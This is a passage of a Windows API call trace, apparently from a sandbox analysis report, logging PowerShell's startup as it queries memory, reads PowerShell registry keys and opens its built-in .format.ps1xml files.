RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.703] VirtualQuery (in: lpAddress=0x13d4c4, lpBuffer=0x13e4c4, dwLength=0x1c | out: lpBuffer=0x13e4c4*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.703] VirtualQuery (in: lpAddress=0x13d4c4, lpBuffer=0x13e4c4, dwLength=0x1c | out: lpBuffer=0x13e4c4*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.704] VirtualQuery (in: lpAddress=0x13d4c4, lpBuffer=0x13e4c4, dwLength=0x1c | out: lpBuffer=0x13e4c4*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.704] VirtualQuery (in: lpAddress=0x13d4c4, lpBuffer=0x13e4c4, dwLength=0x1c | out: lpBuffer=0x13e4c4*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.704] VirtualQuery (in: lpAddress=0x13d4c4, lpBuffer=0x13e4c4, dwLength=0x1c | out: lpBuffer=0x13e4c4*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.704] VirtualQuery (in: lpAddress=0x13d4c4, lpBuffer=0x13e4c4, dwLength=0x1c | out: lpBuffer=0x13e4c4*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.705] VirtualQuery (in: lpAddress=0x13d4c4, lpBuffer=0x13e4c4, dwLength=0x1c | out: lpBuffer=0x13e4c4*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.706] VirtualQuery (in: lpAddress=0x13d4c4, lpBuffer=0x13e4c4, dwLength=0x1c | out: lpBuffer=0x13e4c4*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.706] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e64c | out: phkResult=0x13e64c*=0x354) returned 0x0 [0089.706] RegQueryValueExW (in: hKey=0x354, lpValueName="path", lpReserved=0x0, lpType=0x13e6b4, lpData=0x0, lpcbData=0x13e6b0*=0x0 | out: lpType=0x13e6b4*=0x1, lpData=0x0, lpcbData=0x13e6b0*=0x74) returned 0x0 [0089.706] RegQueryValueExW (in: hKey=0x354, lpValueName="path", lpReserved=0x0, lpType=0x13e694, lpData=0x0, lpcbData=0x13e690*=0x0 | out: lpType=0x13e694*=0x1, lpData=0x0, lpcbData=0x13e690*=0x74) returned 0x0 [0089.706] RegQueryValueExW (in: hKey=0x354, lpValueName="path", lpReserved=0x0, lpType=0x13e694, lpData=0x3953b0, lpcbData=0x13e690*=0x74 | out: lpType=0x13e694*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x13e690*=0x74) returned 0x0 [0089.706] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x13e214, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0089.706] GetLastError () returned 0xcb [0089.706] SetErrorMode (uMode=0x1) returned 0x1 [0089.707] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x13e694 | out: lpFileInformation=0x13e694*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0089.707] GetLastError () returned 0xcb [0089.707] SetErrorMode (uMode=0x1) returned 0x1 [0089.707] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x13e208, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0089.707] GetLastError () returned 0xcb [0089.707] SetErrorMode (uMode=0x1) returned 0x1 [0089.707] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x13e688 | out: lpFileInformation=0x13e688*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a02ba41, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a02ba41, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e5e3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0089.707] GetLastError () returned 0xcb [0089.707] SetErrorMode (uMode=0x1) returned 0x1 [0089.707] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x13e208, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0089.707] GetLastError () returned 0xcb [0089.707] SetErrorMode (uMode=0x1) returned 0x1 [0089.707] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x13e688 | out: lpFileInformation=0x13e688*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1f4ab5, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1f4ab5, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd374b67c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0089.708] GetLastError () returned 0xcb [0089.708] SetErrorMode (uMode=0x1) returned 0x1 [0089.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x13e208, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0089.708] GetLastError () returned 0xcb [0089.708] SetErrorMode (uMode=0x1) returned 0x1 [0089.708] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x13e688 | out: lpFileInformation=0x13e688*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a051ba0, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a051ba0, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2d2d8fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0089.709] GetLastError () returned 0xcb [0089.709] SetErrorMode (uMode=0x1) returned 0x1 [0089.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x13e208, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0089.709] GetLastError () returned 0xcb [0089.709] SetErrorMode (uMode=0x1) returned 0x1 [0089.709] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x13e688 | out: lpFileInformation=0x13e688*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a077cff, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a077cff, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e8455c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0089.709] GetLastError () returned 0xcb [0089.709] SetErrorMode (uMode=0x1) returned 0x1 [0089.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x13e208, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0089.709] GetLastError () returned 0xcb [0089.709] SetErrorMode (uMode=0x1) returned 0x1 [0089.709] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x13e688 | out: lpFileInformation=0x13e688*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0c3fbd, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0c3fbd, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2eaa6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1 [0089.709] GetLastError () returned 0xcb [0089.709] SetErrorMode (uMode=0x1) returned 0x1 [0089.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x13e208, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0089.709] GetLastError () returned 0xcb [0089.709] SetErrorMode (uMode=0x1) returned 0x1 [0089.709] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x13e688 | out: lpFileInformation=0x13e688*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a11027b, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a11027b, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2ed081c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1 [0089.709] GetLastError () returned 0xcb [0089.709] SetErrorMode (uMode=0x1) returned 0x1 [0089.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x13e208, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0089.709] GetLastError () returned 0xcb [0089.709] SetErrorMode (uMode=0x1) returned 0x1 [0089.709] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x13e688 | out: lpFileInformation=0x13e688*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a182698, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a182698, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd368cf9c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1 [0089.709] GetLastError () returned 0xcb [0089.709] SetErrorMode (uMode=0x1) returned 0x1 [0089.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x13e208, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0089.710] GetLastError () returned 0xcb [0089.710] SetErrorMode (uMode=0x1) returned 0x1 [0089.710] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x13e688 | out: lpFileInformation=0x13e688*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1a87f7, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1a87f7, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd36b30fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1 [0089.710] GetLastError () returned 0xcb [0089.710] SetErrorMode (uMode=0x1) returned 0x1 [0089.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x13e208, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0089.710] GetLastError () returned 0xcb [0089.710] SetErrorMode (uMode=0x1) returned 0x1 [0089.710] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x13e688 | out: lpFileInformation=0x13e688*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1ce956, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1ce956, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd372551c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1 [0089.710] GetLastError () returned 0xcb [0089.710] SetErrorMode (uMode=0x1) returned 0x1 [0089.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x13df9c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0089.712] GetLastError () returned 0xcb [0089.712] SetErrorMode (uMode=0x1) returned 0x1 [0089.712] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324 [0089.713] GetLastError () returned 0x0 [0089.713] GetFileType (hFile=0x324) returned 0x1 [0089.713] SetErrorMode (uMode=0x1) returned 0x1 [0089.713] GetFileType (hFile=0x324) returned 0x1 [0089.713] ReadFile (in: hFile=0x324, lpBuffer=0x2fcdcbc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x2fcdcbc*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.714] GetLastError () returned 0x0 [0089.715] ReadFile (in: hFile=0x324, lpBuffer=0x2fcdcbc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x2fcdcbc*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.715] GetLastError () returned 0x0 [0089.715] ReadFile (in: hFile=0x324, lpBuffer=0x2fcdcbc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x2fcdcbc*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.715] GetLastError () returned 0x0 [0089.715] ReadFile (in: hFile=0x324, lpBuffer=0x2fcdcbc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x2fcdcbc*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.715] GetLastError () returned 0x0 [0089.716] ReadFile (in: hFile=0x324, lpBuffer=0x2fcdcbc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x2fcdcbc*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.716] GetLastError () returned 0x0 [0089.716] ReadFile (in: hFile=0x324, lpBuffer=0x2fcdcbc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x2fcdcbc*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.716] GetLastError () returned 0x0 [0089.716] ReadFile (in: hFile=0x324, lpBuffer=0x2fcdcbc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x2fcdcbc*, lpNumberOfBytesRead=0x13e504*=0x9e2, lpOverlapped=0x0) returned 1 [0089.716] GetLastError () returned 0x0 [0089.716] ReadFile (in: hFile=0x324, lpBuffer=0x2fcd23e, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x2fcd23e*, lpNumberOfBytesRead=0x13e504*=0x0, lpOverlapped=0x0) returned 1 [0089.716] GetLastError () returned 0x0 [0089.716] ReadFile (in: hFile=0x324, lpBuffer=0x2fcdcbc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x2fcdcbc*, lpNumberOfBytesRead=0x13e504*=0x0, lpOverlapped=0x0) returned 1 [0089.716] GetLastError () returned 0x0 [0089.716] CloseHandle (hObject=0x324) returned 1 [0089.716] GetLastError () returned 0x0 [0089.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x13e064, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0089.716] GetLastError () returned 0x0 [0089.716] SetErrorMode (uMode=0x1) returned 0x1 [0089.716] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2fded78 | out: lpFileInformation=0x2fded78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a02ba41, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a02ba41, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e5e3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0089.716] GetLastError () returned 0x0 [0089.716] SetErrorMode (uMode=0x1) returned 0x1 [0089.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x13e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0089.717] GetLastError () returned 0x0 [0089.717] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e488 | out: phkResult=0x13e488*=0x324) returned 0x0 [0089.717] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x13e4d0, lpData=0x0, lpcbData=0x13e4cc*=0x0 | out: lpType=0x13e4d0*=0x1, lpData=0x0, lpcbData=0x13e4cc*=0x56) returned 0x0 [0089.717] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x13e4d0, lpData=0x3953b0, lpcbData=0x13e4cc*=0x56 | out: lpType=0x13e4d0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x13e4cc*=0x56) returned 0x0 [0089.717] RegCloseKey (hKey=0x324) returned 0x0 [0089.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x13e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0089.717] GetLastError () returned 0x0 [0089.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x13dfc4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0089.717] GetLastError () returned 0x0 [0089.730] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xdfc96d34, Data2=0xe197, Data3=0x4549, Data4=([0]=0x93, [1]=0x3e, [2]=0x67, [3]=0xb9, [4]=0xae, [5]=0xfa, [6]=0xe7, [7]=0x12))) returned 0x0 [0089.742] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x510e336a, Data2=0x325c, Data3=0x4846, Data4=([0]=0x9c, [1]=0x7, [2]=0x43, [3]=0xf6, [4]=0x3d, [5]=0xc, [6]=0x5a, [7]=0x73))) returned 0x0 [0089.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x13df9c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0089.743] GetLastError () returned 0x0 [0089.743] SetErrorMode (uMode=0x1) returned 0x1 [0089.744] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324 [0089.744] GetLastError () returned 0x0 [0089.744] GetFileType (hFile=0x324) returned 0x1 [0089.744] SetErrorMode (uMode=0x1) returned 0x1 [0089.744] GetFileType (hFile=0x324) returned 0x1 [0089.744] ReadFile (in: hFile=0x324, lpBuffer=0x2ff2060, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x2ff2060*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.745] GetLastError () returned 0x0 [0089.746] ReadFile (in: hFile=0x324, lpBuffer=0x2ff2060, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x2ff2060*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.746] GetLastError () returned 0x0 [0089.746] ReadFile (in: hFile=0x324, lpBuffer=0x2ff2060, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x2ff2060*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.746] GetLastError () returned 0x0 [0089.747] ReadFile (in: hFile=0x324, lpBuffer=0x2ff2060, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x2ff2060*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.747] GetLastError () returned 0x0 [0089.747] ReadFile (in: hFile=0x324, lpBuffer=0x2ff2060, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x2ff2060*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.747] GetLastError () returned 0x0 [0089.747] ReadFile (in: hFile=0x324, lpBuffer=0x2ff2060, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x2ff2060*, lpNumberOfBytesRead=0x13e504*=0xfb2, lpOverlapped=0x0) returned 1 [0089.747] GetLastError () returned 0x0 [0089.747] ReadFile (in: hFile=0x324, lpBuffer=0x2ff17b2, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x2ff17b2*, lpNumberOfBytesRead=0x13e504*=0x0, lpOverlapped=0x0) returned 1 [0089.747] GetLastError () returned 0x0 [0089.748] ReadFile (in: hFile=0x324, lpBuffer=0x2ff2060, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x2ff2060*, lpNumberOfBytesRead=0x13e504*=0x0, lpOverlapped=0x0) returned 1 [0089.748] GetLastError () returned 0x0 [0089.748] CloseHandle (hObject=0x324) returned 1 [0089.748] GetLastError () returned 0x0 [0089.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x13e064, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0089.748] GetLastError () returned 0x0 [0089.748] SetErrorMode (uMode=0x1) returned 0x1 [0089.748] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x30128f0 | out: lpFileInformation=0x30128f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1f4ab5, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1f4ab5, ftLastAccessTime.dwHighDateTime=0x1ca03f9, 